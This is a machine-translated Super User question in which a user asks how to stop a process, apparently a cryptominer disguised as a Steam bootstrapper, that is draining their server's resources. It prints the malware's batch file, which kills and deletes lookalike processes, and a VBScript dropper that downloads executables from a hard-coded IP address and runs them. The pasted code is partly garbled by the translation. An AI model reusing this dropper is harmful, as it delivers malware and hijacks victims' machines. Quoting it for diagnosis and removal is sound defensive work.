windows - Як пастаянна забіваць паравую кліентку bootstrapper - Super User

У мяне ёсць наступная сітуацыя ў мэнэджары задач:

У мяне ёсць наступная сітуацыя ў мэнэджары задач:

Я не ведаю, што гэта за дадатак, але, безумоўна, не пачатковы загрузчык кліента Steam, таму што я яго не ўсталяваў, і не магу выдаліць яго.

Калі я паспрабую высветліць, якое прыкладанне гэта праз гэты крок:

Я бачу нешта накшталт гэтага:

У утыліце MS Config я не знайшоў нічога падобнага на secury.exe.

Калі я адкрываю размяшчэнне файла, я бачу тры файла:

m.bat, b.exe, 4.vbs.

Ніжэй прыведзены змест m.bat:

taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe Taskkkill / f / t / im MSASCui.exe Taskkkill / f / t / im SystemSettlngs.exe Taskkkill / f / t / im SystemSetting.exe Taskkkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe файлавы файл / f / t / im soiuos.exe файлавы файл / f / t / im TrustedInstaller.exe дэль C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe дэль C: \ ProgramData \ kingsoft.exe дэль C: \ ProgramData \ expl0rer.exe дэль C: \ ProgramData \ ieplare.exe дэль C: \ ProgramData \ nssm.exe дэль C: ProgramData \ MSASCui.exe дэль C: \ Pro gramData \ SystemSettlngs.exe дэль C: \ ProgramData \ SystemSetting.exe дэль C: \ ProgramData \ Process.exe дэль C: \ ProgramData \ winlnlt.exe дэль C: \ ProgramData \ WindowsUpgrade.exe дэль C: \ ProgramData \ msdc.exe дэль C: \ ProgramData \ Fiddlere.exe дэль C: \ ProgramData \ shovst.exe дэль C: \ ProgramData \ lqrtqe.exe дэль C: \ ProgramData \ apkls.exe дэль C: \ ProgramData \ winlog.exe дэль C: \ ProgramData \ Svchosts.exe дэль C: \ ProgramData \ win1ogins.exe дэль C: \ ProgramData \ shovsts.exe дэль C: \ ProgramData \ fcty.exe дэль C: \ ProgramData \ pool.exe дэль C: \ ProgramData \ pool2.exe дэль C: \ ProgramData \ pool3.exe

Далей ідзе 4.vbs:

Усталюйце xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Усталюйце sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Усталяваць sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"). Запусціце "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell"). Выканаць "del C: \ ProgramData \ pool3.exe"

Што я магу зрабіць, каб спыніць secury.exe ад злоўжыванняў вылічальнымі магчымасцямі майго сервера?

PS Я выканаў Avast поўную праверку майго кампутара, але нічога дрэннага ён не знайшоў.